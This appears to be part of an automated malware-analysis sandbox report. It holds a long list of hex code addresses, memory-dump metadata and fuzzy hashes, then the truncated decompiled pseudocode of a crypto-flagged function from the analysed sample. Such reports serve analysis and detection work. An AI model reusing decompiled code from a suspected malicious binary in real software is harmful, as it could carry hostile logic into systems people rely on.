                                                                                                                                                        0x012d769c
                                                                                                                                                        0x012d769f
                                                                                                                                                        0x012d76aa
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d6bcf
                                                                                                                                                        0x012d76b8
                                                                                                                                                        0x012d76d1
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d6bd5
                                                                                                                                                        0x012d6bdd
                                                                                                                                                        0x012d6be3
                                                                                                                                                        0x012d6beb
                                                                                                                                                        0x012d6bf0
                                                                                                                                                        0x012d70d8
                                                                                                                                                        0x012d70d8
                                                                                                                                                        0x012d70dd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d68e8
                                                                                                                                                        0x012d68ee
                                                                                                                                                        0x012d6f9b
                                                                                                                                                        0x012d795b
                                                                                                                                                        0x012d7965
                                                                                                                                                        0x012d7968
                                                                                                                                                        0x012d796d
                                                                                                                                                        0x012d7975
                                                                                                                                                        0x012d7987
                                                                                                                                                        0x012d6fa1
                                                                                                                                                        0x012d6fa7
                                                                                                                                                        0x012d7994
                                                                                                                                                        0x012d799c
                                                                                                                                                        0x012d79b2
                                                                                                                                                        0x012d6fad
                                                                                                                                                        0x012d6fad
                                                                                                                                                        0x012d6fb5
                                                                                                                                                        0x012d6fbb
                                                                                                                                                        0x012d6fbb
                                                                                                                                                        0x012d6fb5
                                                                                                                                                        0x012d6fa7
                                                                                                                                                        0x012d68f4
                                                                                                                                                        0x012d68fa
                                                                                                                                                        0x012d73f4
                                                                                                                                                        0x012d73f9
                                                                                                                                                        0x012d73ff
                                                                                                                                                        0x012d7405
                                                                                                                                                        0x012d740e
                                                                                                                                                        0x012d7416
                                                                                                                                                        0x012d7418
                                                                                                                                                        0x012d7420
                                                                                                                                                        0x012d7423
                                                                                                                                                        0x012d6900
                                                                                                                                                        0x012d6906
                                                                                                                                                        0x012d742d
                                                                                                                                                        0x012d7442
                                                                                                                                                        0x012d690c
                                                                                                                                                        0x012d690c
                                                                                                                                                        0x012d6914
                                                                                                                                                        0x012d6922
                                                                                                                                                        0x012d692f
                                                                                                                                                        0x012d6939
                                                                                                                                                        0x012d693b
                                                                                                                                                        0x012d6951
                                                                                                                                                        0x012d6951
                                                                                                                                                        0x012d6914
                                                                                                                                                        0x012d6906
                                                                                                                                                        0x012d68fa
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d66a7
                                                                                                                                                        0x012d66a0
                                                                                                                                                        0x012d68e2
                                                                                                                                                        0x012d6797
                                                                                                                                                        0x012d6a48
                                                                                                                                                        0x012d7079
                                                                                                                                                        0x012d7a30
                                                                                                                                                        0x012d7a35
                                                                                                                                                        0x012d7a3f
                                                                                                                                                        0x012d7a55
                                                                                                                                                        0x012d7a57
                                                                                                                                                        0x012d7a5f
                                                                                                                                                        0x012d707f
                                                                                                                                                        0x012d707f
                                                                                                                                                        0x012d7087
                                                                                                                                                        0x012d7095
                                                                                                                                                        0x012d709b
                                                                                                                                                        0x012d70a3
                                                                                                                                                        0x012d70a6
                                                                                                                                                        0x012d70a6
                                                                                                                                                        0x012d7087
                                                                                                                                                        0x012d6a4e
                                                                                                                                                        0x012d6a54
                                                                                                                                                        0x012d7581
                                                                                                                                                        0x012d758f
                                                                                                                                                        0x012d7595
                                                                                                                                                        0x012d75a2
                                                                                                                                                        0x012d75a7
                                                                                                                                                        0x012d75ad
                                                                                                                                                        0x012d75b3
                                                                                                                                                        0x012d75ba
                                                                                                                                                        0x012d75bc
                                                                                                                                                        0x012d6a5a
                                                                                                                                                        0x012d6a60
                                                                                                                                                        0x012d75ce
                                                                                                                                                        0x012d75d6
                                                                                                                                                        0x012d75eb
                                                                                                                                                        0x012d6a66
                                                                                                                                                        0x012d6a66
                                                                                                                                                        0x012d6a6e
                                                                                                                                                        0x012d6a86
                                                                                                                                                        0x012d6a8d
                                                                                                                                                        0x012d6a8d
                                                                                                                                                        0x012d6a6e
                                                                                                                                                        0x012d6a60
                                                                                                                                                        0x012d6a54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6a48
                                                                                                                                                        0x012d67a3
                                                                                                                                                        0x012d6d79
                                                                                                                                                        0x012d7846
                                                                                                                                                        0x012d785d
                                                                                                                                                        0x012d7860
                                                                                                                                                        0x012d786c
                                                                                                                                                        0x012d7874
                                                                                                                                                        0x012d7a23
                                                                                                                                                        0x012d7a23
                                                                                                                                                        0x012d7a28
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7a28
                                                                                                                                                        0x012d6d85
                                                                                                                                                        0x012d787b
                                                                                                                                                        0x012d7880
                                                                                                                                                        0x012d6d8b
                                                                                                                                                        0x012d6d8b
                                                                                                                                                        0x012d6d93
                                                                                                                                                        0x012d6da1
                                                                                                                                                        0x012d6daf
                                                                                                                                                        0x012d6db5
                                                                                                                                                        0x012d6dc2
                                                                                                                                                        0x012d6dc7
                                                                                                                                                        0x012d6dcd
                                                                                                                                                        0x012d6dd3
                                                                                                                                                        0x012d6dda
                                                                                                                                                        0x012d6ddc
                                                                                                                                                        0x012d6ddc
                                                                                                                                                        0x012d6d93
                                                                                                                                                        0x012d67a9
                                                                                                                                                        0x012d67af
                                                                                                                                                        0x012d72ca
                                                                                                                                                        0x012d72d5
                                                                                                                                                        0x012d67b5
                                                                                                                                                        0x012d67bb
                                                                                                                                                        0x012d72e4
                                                                                                                                                        0x012d72e9
                                                                                                                                                        0x012d72f1
                                                                                                                                                        0x012d72f9
                                                                                                                                                        0x012d7301
                                                                                                                                                        0x012d7306
                                                                                                                                                        0x012d67c1
                                                                                                                                                        0x012d67c1
                                                                                                                                                        0x012d67c9
                                                                                                                                                        0x012d67cf
                                                                                                                                                        0x012d67e7
                                                                                                                                                        0x012d67ea
                                                                                                                                                        0x012d67c9
                                                                                                                                                        0x012d67bb
                                                                                                                                                        0x012d67af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d67a3
                                                                                                                                                        0x012d66bb
                                                                                                                                                        0x012d683f
                                                                                                                                                        0x012d6aee
                                                                                                                                                        0x012d70ea
                                                                                                                                                        0x012d7671
                                                                                                                                                        0x012d7671
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7671
                                                                                                                                                        0x012d70f0
                                                                                                                                                        0x012d70f8
                                                                                                                                                        0x012d7107
                                                                                                                                                        0x012d710e
                                                                                                                                                        0x012d710e
                                                                                                                                                        0x012d6af4
                                                                                                                                                        0x012d6afa
                                                                                                                                                        0x012d7646
                                                                                                                                                        0x012d7651
                                                                                                                                                        0x012d6b00
                                                                                                                                                        0x012d6b00
                                                                                                                                                        0x012d6b09
                                                                                                                                                        0x012d6b0f
                                                                                                                                                        0x012d6b17
                                                                                                                                                        0x012d6b25
                                                                                                                                                        0x012d6b33
                                                                                                                                                        0x012d6b3b
                                                                                                                                                        0x012d6b50
                                                                                                                                                        0x012d6b50
                                                                                                                                                        0x012d6b17
                                                                                                                                                        0x012d6b09
                                                                                                                                                        0x012d6afa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6aee
                                                                                                                                                        0x012d684b
                                                                                                                                                        0x012d6e14
                                                                                                                                                        0x012d6e1c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6e28
                                                                                                                                                        0x012d7914
                                                                                                                                                        0x012d791e
                                                                                                                                                        0x012d7925
                                                                                                                                                        0x012d792f
                                                                                                                                                        0x012d7936
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7936
                                                                                                                                                        0x012d6e2e
                                                                                                                                                        0x012d6e36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6e3c
                                                                                                                                                        0x012d6e3f
                                                                                                                                                        0x012d6e45
                                                                                                                                                        0x012d6e48
                                                                                                                                                        0x012d6e4b
                                                                                                                                                        0x012d6e50
                                                                                                                                                        0x012d6e67
                                                                                                                                                        0x012d6e6f
                                                                                                                                                        0x012d6e74
                                                                                                                                                        0x012d6e7a
                                                                                                                                                        0x012d6e7d
                                                                                                                                                        0x012d6e85
                                                                                                                                                        0x012d6e90
                                                                                                                                                        0x012d6ea3
                                                                                                                                                        0x012d6ed1
                                                                                                                                                        0x012d6ed1
                                                                                                                                                        0x012d6ed9
                                                                                                                                                        0x012d6ee1
                                                                                                                                                        0x012d6ee4
                                                                                                                                                        0x012d6ef1
                                                                                                                                                        0x012d6f01
                                                                                                                                                        0x012d6f0f
                                                                                                                                                        0x012d6f14
                                                                                                                                                        0x012d6f27
                                                                                                                                                        0x012d6f2d
                                                                                                                                                        0x012d6f30
                                                                                                                                                        0x012d6f33
                                                                                                                                                        0x012d6f36
                                                                                                                                                        0x012d6f39
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6f39
                                                                                                                                                        0x012d6ea7
                                                                                                                                                        0x012d6ea7
                                                                                                                                                        0x012d6eb2
                                                                                                                                                        0x012d6ec0
                                                                                                                                                        0x012d6eca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6ea7
                                                                                                                                                        0x012d6857
                                                                                                                                                        0x012d7334
                                                                                                                                                        0x012d7349
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7349
                                                                                                                                                        0x012d6863
                                                                                                                                                        0x012d688c
                                                                                                                                                        0x012d688c
                                                                                                                                                        0x012d6891
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6891
                                                                                                                                                        0x012d6865
                                                                                                                                                        0x012d686d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6873
                                                                                                                                                        0x012d687b
                                                                                                                                                        0x012d6881
                                                                                                                                                        0x012d6889
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6889
                                                                                                                                                        0x012d686d
                                                                                                                                                        0x012d66c7
                                                                                                                                                        0x012d66d3
                                                                                                                                                        0x012d6c54
                                                                                                                                                        0x012d7726
                                                                                                                                                        0x012d7743
                                                                                                                                                        0x012d6c5a
                                                                                                                                                        0x012d6c60
                                                                                                                                                        0x012d7753
                                                                                                                                                        0x012d775b
                                                                                                                                                        0x012d7765
                                                                                                                                                        0x012d776a
                                                                                                                                                        0x012d6c66
                                                                                                                                                        0x012d6c66
                                                                                                                                                        0x012d6c6e
                                                                                                                                                        0x012d6c79
                                                                                                                                                        0x012d6c7e
                                                                                                                                                        0x012d6c8b
                                                                                                                                                        0x012d6c90
                                                                                                                                                        0x012d6c98
                                                                                                                                                        0x012d6ca0
                                                                                                                                                        0x012d6ca3
                                                                                                                                                        0x012d6cad
                                                                                                                                                        0x012d6cb3
                                                                                                                                                        0x012d6cb9
                                                                                                                                                        0x012d6cbe
                                                                                                                                                        0x012d6cc3
                                                                                                                                                        0x012d6cd2
                                                                                                                                                        0x012d6cd5
                                                                                                                                                        0x012d6cd8
                                                                                                                                                        0x012d6cdf
                                                                                                                                                        0x012d6cef
                                                                                                                                                        0x012d6cf7
                                                                                                                                                        0x012d6cfb
                                                                                                                                                        0x012d6d08
                                                                                                                                                        0x012d6d18
                                                                                                                                                        0x012d6d22
                                                                                                                                                        0x012d6d2a
                                                                                                                                                        0x012d6d31
                                                                                                                                                        0x012d6d37
                                                                                                                                                        0x012d6d37
                                                                                                                                                        0x012d6c6e
                                                                                                                                                        0x012d6c60
                                                                                                                                                        0x012d66d9
                                                                                                                                                        0x012d66df
                                                                                                                                                        0x012d7215
                                                                                                                                                        0x012d7224
                                                                                                                                                        0x012d722c
                                                                                                                                                        0x012d7234
                                                                                                                                                        0x012d7240
                                                                                                                                                        0x012d7255
                                                                                                                                                        0x012d66e5
                                                                                                                                                        0x012d66eb
                                                                                                                                                        0x012d725d
                                                                                                                                                        0x012d7262
                                                                                                                                                        0x012d66f1
                                                                                                                                                        0x012d66f1
                                                                                                                                                        0x012d66f9
                                                                                                                                                        0x012d66fb
                                                                                                                                                        0x012d6703
                                                                                                                                                        0x012d6703
                                                                                                                                                        0x012d66f9
                                                                                                                                                        0x012d66eb
                                                                                                                                                        0x012d66df
                                                                                                                                                        0x012d69b7
                                                                                                                                                        0x012d69bd
                                                                                                                                                        0x012d6fec
                                                                                                                                                        0x012d79de
                                                                                                                                                        0x012d79f0
                                                                                                                                                        0x012d7a0b
                                                                                                                                                        0x012d6ff2
                                                                                                                                                        0x012d6ff2
                                                                                                                                                        0x012d6ffa
                                                                                                                                                        0x012d7000
                                                                                                                                                        0x012d700b
                                                                                                                                                        0x012d700b
                                                                                                                                                        0x012d6ffa
                                                                                                                                                        0x012d69c3
                                                                                                                                                        0x012d69c9
                                                                                                                                                        0x012d744a
                                                                                                                                                        0x012d7452
                                                                                                                                                        0x012d7467
                                                                                                                                                        0x012d69cf
                                                                                                                                                        0x012d69d5
                                                                                                                                                        0x012d7477
                                                                                                                                                        0x012d7484
                                                                                                                                                        0x012d7491
                                                                                                                                                        0x012d7499
                                                                                                                                                        0x012d74a1
                                                                                                                                                        0x012d74a9
                                                                                                                                                        0x012d74b1
                                                                                                                                                        0x012d74c2
                                                                                                                                                        0x012d69db
                                                                                                                                                        0x012d69db
                                                                                                                                                        0x012d69e3
                                                                                                                                                        0x012d69e9
                                                                                                                                                        0x012d69e9
                                                                                                                                                        0x012d69e3
                                                                                                                                                        0x012d69d5
                                                                                                                                                        0x012d69c9
                                                                                                                                                        0x012d69bd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d670a
                                                                                                                                                        0x012d6710
                                                                                                                                                        0x012d67f7
                                                                                                                                                        0x012d695f
                                                                                                                                                        0x012d6bfe
                                                                                                                                                        0x012d7196
                                                                                                                                                        0x012d7b18
                                                                                                                                                        0x012d7b1e
                                                                                                                                                        0x012d719c
                                                                                                                                                        0x012d719c
                                                                                                                                                        0x012d71a4
                                                                                                                                                        0x012d71aa
                                                                                                                                                        0x012d71cc
                                                                                                                                                        0x012d71d2
                                                                                                                                                        0x012d71dc
                                                                                                                                                        0x012d71ec
                                                                                                                                                        0x012d71f4
                                                                                                                                                        0x012d7206
                                                                                                                                                        0x012d7206
                                                                                                                                                        0x012d71a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7196
                                                                                                                                                        0x012d6c0a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6c10
                                                                                                                                                        0x012d6c16
                                                                                                                                                        0x012d76ef
                                                                                                                                                        0x012d76f3
                                                                                                                                                        0x012d76fb
                                                                                                                                                        0x012d7700
                                                                                                                                                        0x012d770d
                                                                                                                                                        0x012d7714
                                                                                                                                                        0x012d6c1c
                                                                                                                                                        0x012d6c1c
                                                                                                                                                        0x012d6c24
                                                                                                                                                        0x012d6c31
                                                                                                                                                        0x012d6c46
                                                                                                                                                        0x012d6c46
                                                                                                                                                        0x012d6c24
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6c16
                                                                                                                                                        0x012d6c0a
                                                                                                                                                        0x012d696b
                                                                                                                                                        0x012d6fcd
                                                                                                                                                        0x012d79ce
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d79ce
                                                                                                                                                        0x012d6fd3
                                                                                                                                                        0x012d6fdb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7a8f
                                                                                                                                                        0x012d7a8f
                                                                                                                                                        0x012d7a92
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7a92
                                                                                                                                                        0x012d6977
                                                                                                                                                        0x012d7b28
                                                                                                                                                        0x012d7b42
                                                                                                                                                        0x012d697d
                                                                                                                                                        0x012d697d
                                                                                                                                                        0x012d6985
                                                                                                                                                        0x012d698b
                                                                                                                                                        0x012d6990
                                                                                                                                                        0x012d699b
                                                                                                                                                        0x012d69a5
                                                                                                                                                        0x012d69ad
                                                                                                                                                        0x012d69ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6985
                                                                                                                                                        0x012d6977
                                                                                                                                                        0x012d6803
                                                                                                                                                        0x012d6a9c
                                                                                                                                                        0x012d70b6
                                                                                                                                                        0x012d7a69
                                                                                                                                                        0x012d7a75
                                                                                                                                                        0x012d7a7a
                                                                                                                                                        0x012d7a80
                                                                                                                                                        0x012d7a86
                                                                                                                                                        0x012d7a8d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7a8d
                                                                                                                                                        0x012d70bc
                                                                                                                                                        0x012d70c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d70ca
                                                                                                                                                        0x012d70d2
                                                                                                                                                        0x012d70d2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d70d2
                                                                                                                                                        0x012d6aa8
                                                                                                                                                        0x012d75ff
                                                                                                                                                        0x012d7603
                                                                                                                                                        0x012d760f
                                                                                                                                                        0x012d7624
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7624
                                                                                                                                                        0x012d6ab4
                                                                                                                                                        0x012d762c
                                                                                                                                                        0x012d7631
                                                                                                                                                        0x012d7636
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7636
                                                                                                                                                        0x012d6aba
                                                                                                                                                        0x012d6ac2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6ac8
                                                                                                                                                        0x012d6ad1
                                                                                                                                                        0x012d6ad9
                                                                                                                                                        0x012d6adb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6adb
                                                                                                                                                        0x012d6ac2
                                                                                                                                                        0x012d680f
                                                                                                                                                        0x012d6dec
                                                                                                                                                        0x012d7894
                                                                                                                                                        0x012d78a1
                                                                                                                                                        0x012d78a6
                                                                                                                                                        0x012d78ae
                                                                                                                                                        0x012d78bb
                                                                                                                                                        0x012d78c3
                                                                                                                                                        0x012d6df2
                                                                                                                                                        0x012d6df8
                                                                                                                                                        0x012d78d5
                                                                                                                                                        0x012d78ea
                                                                                                                                                        0x012d78f2
                                                                                                                                                        0x012d7907
                                                                                                                                                        0x012d6dfe
                                                                                                                                                        0x012d6dfe
                                                                                                                                                        0x012d6e06
                                                                                                                                                        0x012d6e0c
                                                                                                                                                        0x012d6e0c
                                                                                                                                                        0x012d6e06
                                                                                                                                                        0x012d6df8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6dec
                                                                                                                                                        0x012d681b
                                                                                                                                                        0x012d732c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d732c
                                                                                                                                                        0x012d6827
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6829
                                                                                                                                                        0x012d6831
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6837
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6837
                                                                                                                                                        0x012d6831
                                                                                                                                                        0x012d671c
                                                                                                                                                        0x012d689f
                                                                                                                                                        0x012d6b5e
                                                                                                                                                        0x012d711e
                                                                                                                                                        0x012d7aa4
                                                                                                                                                        0x012d7aaa
                                                                                                                                                        0x012d7ab2
                                                                                                                                                        0x012d7ac5
                                                                                                                                                        0x012d7aca
                                                                                                                                                        0x012d7ad0
                                                                                                                                                        0x012d7ad6
                                                                                                                                                        0x012d7add
                                                                                                                                                        0x012d7adf
                                                                                                                                                        0x012d7ae9
                                                                                                                                                        0x012d7124
                                                                                                                                                        0x012d7124
                                                                                                                                                        0x012d712c
                                                                                                                                                        0x012d7132
                                                                                                                                                        0x012d7137
                                                                                                                                                        0x012d7137
                                                                                                                                                        0x012d712c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d711e
                                                                                                                                                        0x012d6b6a
                                                                                                                                                        0x012d765b
                                                                                                                                                        0x012d7667
                                                                                                                                                        0x012d766f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6b70
                                                                                                                                                        0x012d6b76
                                                                                                                                                        0x012d767b
                                                                                                                                                        0x012d6b7c
                                                                                                                                                        0x012d6b7c
                                                                                                                                                        0x012d6b84
                                                                                                                                                        0x012d6b8f
                                                                                                                                                        0x012d6b94
                                                                                                                                                        0x012d6b99
                                                                                                                                                        0x012d6b9c
                                                                                                                                                        0x012d6ba1
                                                                                                                                                        0x012d6ba1
                                                                                                                                                        0x012d6b84
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6b76
                                                                                                                                                        0x012d6b6a
                                                                                                                                                        0x012d68ab
                                                                                                                                                        0x012d6f41
                                                                                                                                                        0x012d6f4a
                                                                                                                                                        0x012d6f56
                                                                                                                                                        0x012d7940
                                                                                                                                                        0x012d794f
                                                                                                                                                        0x012d7951
                                                                                                                                                        0x012d6f5c
                                                                                                                                                        0x012d6f5c
                                                                                                                                                        0x012d6f64
                                                                                                                                                        0x012d6f71
                                                                                                                                                        0x012d6f75
                                                                                                                                                        0x012d6f8d
                                                                                                                                                        0x012d6f8d
                                                                                                                                                        0x012d6f64
                                                                                                                                                        0x012d6f56
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6f4a
                                                                                                                                                        0x012d68b7
                                                                                                                                                        0x012d7358
                                                                                                                                                        0x012d7364
                                                                                                                                                        0x012d736c
                                                                                                                                                        0x012d7384
                                                                                                                                                        0x012d738b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d738b
                                                                                                                                                        0x012d68c3
                                                                                                                                                        0x012d739c
                                                                                                                                                        0x012d73ac
                                                                                                                                                        0x012d73bc
                                                                                                                                                        0x012d73bf
                                                                                                                                                        0x012d73c7
                                                                                                                                                        0x012d73c9
                                                                                                                                                        0x012d73d1
                                                                                                                                                        0x012d73d9
                                                                                                                                                        0x012d73ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d73ea
                                                                                                                                                        0x012d68c9
                                                                                                                                                        0x012d68d1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d68d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d68d7
                                                                                                                                                        0x012d68d1
                                                                                                                                                        0x012d6728
                                                                                                                                                        0x012d69fb
                                                                                                                                                        0x012d701b
                                                                                                                                                        0x012d7a13
                                                                                                                                                        0x012d7a1b
                                                                                                                                                        0x012d7a20
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7a20
                                                                                                                                                        0x012d7021
                                                                                                                                                        0x012d7029
                                                                                                                                                        0x012d7037
                                                                                                                                                        0x012d703f
                                                                                                                                                        0x012d7049
                                                                                                                                                        0x012d7057
                                                                                                                                                        0x012d706b
                                                                                                                                                        0x012d706b
                                                                                                                                                        0x012d6a01
                                                                                                                                                        0x012d6a07
                                                                                                                                                        0x012d74d1
                                                                                                                                                        0x012d74e9
                                                                                                                                                        0x012d74f5
                                                                                                                                                        0x012d74fd
                                                                                                                                                        0x012d7509
                                                                                                                                                        0x012d751e
                                                                                                                                                        0x012d7523
                                                                                                                                                        0x012d6a0d
                                                                                                                                                        0x012d6a13
                                                                                                                                                        0x012d752c
                                                                                                                                                        0x012d7532
                                                                                                                                                        0x012d7542
                                                                                                                                                        0x012d7550
                                                                                                                                                        0x012d7567
                                                                                                                                                        0x012d756f
                                                                                                                                                        0x012d6a19
                                                                                                                                                        0x012d6a19
                                                                                                                                                        0x012d6a21
                                                                                                                                                        0x012d6a3a
                                                                                                                                                        0x012d6a3a
                                                                                                                                                        0x012d6a21
                                                                                                                                                        0x012d6a13
                                                                                                                                                        0x012d6a07
                                                                                                                                                        0x012d672e
                                                                                                                                                        0x012d6734
                                                                                                                                                        0x012d6d47
                                                                                                                                                        0x012d7780
                                                                                                                                                        0x012d7784
                                                                                                                                                        0x012d778c
                                                                                                                                                        0x012d7791
                                                                                                                                                        0x012d779e
                                                                                                                                                        0x012d77b0
                                                                                                                                                        0x012d77c2
                                                                                                                                                        0x012d77d8
                                                                                                                                                        0x012d77e8
                                                                                                                                                        0x012d77fa
                                                                                                                                                        0x012d7806
                                                                                                                                                        0x012d780a
                                                                                                                                                        0x012d7816
                                                                                                                                                        0x012d781d
                                                                                                                                                        0x012d6d4d
                                                                                                                                                        0x012d6d53
                                                                                                                                                        0x012d782d
                                                                                                                                                        0x012d7838
                                                                                                                                                        0x012d783c
                                                                                                                                                        0x012d6d59
                                                                                                                                                        0x012d6d59
                                                                                                                                                        0x012d6d61
                                                                                                                                                        0x012d6d67
                                                                                                                                                        0x012d6d67
                                                                                                                                                        0x012d6d61
                                                                                                                                                        0x012d6d53
                                                                                                                                                        0x012d673a
                                                                                                                                                        0x012d6740
                                                                                                                                                        0x012d727a
                                                                                                                                                        0x012d7282
                                                                                                                                                        0x012d7297
                                                                                                                                                        0x012d6746
                                                                                                                                                        0x012d674c
                                                                                                                                                        0x012d72a6
                                                                                                                                                        0x012d72aa
                                                                                                                                                        0x012d72c2
                                                                                                                                                        0x012d6752
                                                                                                                                                        0x012d6752
                                                                                                                                                        0x012d675a
                                                                                                                                                        0x012d6760
                                                                                                                                                        0x012d6768
                                                                                                                                                        0x012d676d
                                                                                                                                                        0x012d6770
                                                                                                                                                        0x012d6775
                                                                                                                                                        0x012d6775
                                                                                                                                                        0x012d675a
                                                                                                                                                        0x012d674c
                                                                                                                                                        0x012d6740
                                                                                                                                                        0x012d6734
                                                                                                                                                        0x012d6728

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: >en$?en$?en$[O$\O$\O$a'/$b'/$b'/$b'/
                                                                                                                                                        • API String ID: 0-3790037689
                                                                                                                                                        • Opcode ID: 992b3a2e51049f5b4f1ee8d81303aa8e031c5bb5490aaf88099e212acc2056f3
                                                                                                                                                        • Instruction ID: afcf0dd6826a10319af718d5652985883ea87e9633409c4febb3dceb93d9c009
                                                                                                                                                        • Opcode Fuzzy Hash: 992b3a2e51049f5b4f1ee8d81303aa8e031c5bb5490aaf88099e212acc2056f3
                                                                                                                                                        • Instruction Fuzzy Hash: 95A260762297C58ADB798F19E4903AEB7A1F7C8B44F50401ADB8E87B64DB7DC480CB41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012E0CE8, Relevance: 12.2, Strings: 9, Instructions: 989COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                        			E012E0CE8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, signed long long __rax, signed long long __rcx, signed long long __rdx, signed long long __r8) {
				signed long long _v72;
				signed long long _v80;
				signed long long _v88;
				void* _v96;
				long long _v104;
				signed long long _v112;
				void* _v120;
				long long _v128;
				signed long long _v136;
				signed long long _v144;
				signed long long _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				void* _v168;
				void* _v176;
				void* _v184;
				long long _v192;
				void* _v200;
				signed long long _v208;
				intOrPtr _v216;
				char _v220;
				char _v224;
				unsigned int _v232;
				long long _v240;
				signed long long _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				signed long long _v260;
				signed long long _v264;
				signed long long _v268;
				signed long long _v272;
				signed long long _v276;
				signed long long _v280;
				signed long long _v284;
				signed long long _v288;
				void* _v296;
				signed long long _v304;
				void* _v312;
				signed long long _v316;
				signed long long _v320;
				signed long long _v324;
				signed long long _v328;
				signed long long _v332;
				signed long long _v336;
				signed long long _v340;
				signed long long _v344;
				signed long long _v348;
				signed long long _v352;
				signed long long _v356;
				signed long long _v360;
				signed int _v364;
				void* _v376;
				void* _v384;
				signed long long _v388;
				signed int _v392;
				signed long long _v400;
				short _v402;
				unsigned int _v408;
				signed long long _v416;
				signed int _v417;
				signed char _v418;
				char _v419;
				signed int _v420;
				signed char _v421;
				long long _v432;
				signed long long _v440;
				intOrPtr _v464;
				signed long long _v472;
				void* _t308;
				void* _t313;
				void* _t542;
				void* _t543;
				signed long long _t556;
				signed long long _t557;
				intOrPtr _t576;
				long long _t598;
				signed long long _t599;
				signed long long _t600;
				signed int* _t617;
				intOrPtr _t622;
				signed long long _t635;
				signed long long _t636;
				long long _t638;
				signed long long _t644;
				long long _t648;
				signed long long _t654;
				signed long long* _t655;
				signed long long _t656;
				signed long long _t659;

				_t656 = __r8;
				_t600 = __rcx;
				_t556 = __rax;
				_t543 = __ebp;
				_t542 = __esi;
				_t655 =  &_v440;
				_t659 = __rdx;
				_t636 = __rcx;
				E012DCDB9(0x18, __rax);
				_v208 = _t556;
				_t308 = E012DCDB9(0x68, _t556);
				_t599 = _t556;
				 *_t556 = 0x68;
				 *(_t556 + 0x3c) = 1;
				 *((short*)(_t556 + 0x40)) = 0;
				_t638 = _v208;
				r8d = 0x2bf91925;
				goto L1;
				 *0x4431bdc7 = 0x11026e3a;
				_t313 = 0x28;
				 *_t556 =  *_t556 + 0x28;
				 *((intOrPtr*)(_t600 + 0xa8248c)) =  *((intOrPtr*)(_t600 + 0xa8248c));
				 *_t556 =  *_t556 + 0x28;
				_v340 = 0;
				_v344 = 0;
				_v348 = 0;
				_v352 = 0;
				_v360 = 0;
